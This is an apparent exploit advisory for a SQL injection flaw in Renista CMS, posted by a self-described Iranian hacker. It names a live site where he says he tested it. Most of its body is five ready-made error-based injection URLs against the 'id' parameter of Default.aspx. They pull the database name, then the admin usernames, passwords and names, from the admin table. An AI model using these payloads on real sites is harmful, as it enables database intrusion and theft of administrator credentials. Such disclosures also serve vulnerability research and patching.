Renista CMS - SQL Injection

Author:Amir Afghanian 
Discovered by :Amir Afghanian
My Email: [email protected]
my Y!ID: Amir_Coder
My Home page : www.shabgard.org
My Nice name : TakFanar
============
Renista CMS BUG		
Only For NOTIFICATION	
==================
Test on CMS Owner site :http://www.rayaco.com	
					
# db name :
http://server/rtl/Default.aspx?ln=Fa&id=3' and 1=convert(int,db_name())--

# cont user :
http://server/rtl/Default.aspx?ln=Fa&id=3' and 1=convert(int,(SELECT TOP 1 cast(count(*) as nvarchar(4000))%2bchar(126) FROM Portal_BehPardazco..TBAdmin ))--

# username :
http://server/rtl/Default.aspx?ln=Fa&id=3' and 1=convert(int,(SELECT TOP 1 cast(UserName as nvarchar(4000))%2bchar(126) FROM (SELECT TOP 1 * FROM Portal_BehPardazco..TBAdmin order by Ln asc) sq order by Ln desc))--

# password :
http://server/rtl/Default.aspx?ln=Fa&id=3' and 1=convert(int,(SELECT TOP 1 cast(Password as nvarchar(4000))%2bchar(126) FROM (SELECT TOP 1 * FROM Portal_BehPardazco..TBAdmin order by Ln asc) sq order by Ln desc))--
# name :
http://server/rtl/Default.aspx?ln=Fa&id=3' and 1=convert(int,(SELECT TOP 1 cast(Name as nvarchar(4000))%2bchar(126) FROM (SELECT TOP 1 * FROM Portal_BehPardazco..TBAdmin order by Ln asc) sq order by Ln desc))--
========================
I tried and finally find bug at this CMS ( Renista ) but i dont wanna any damage for the company, just for fun and NOTIFICATION .

Special thanks to llvllr_special ,shabgard.org,Emperor, and other Iranian Hecker ...
Contact me : [email protected]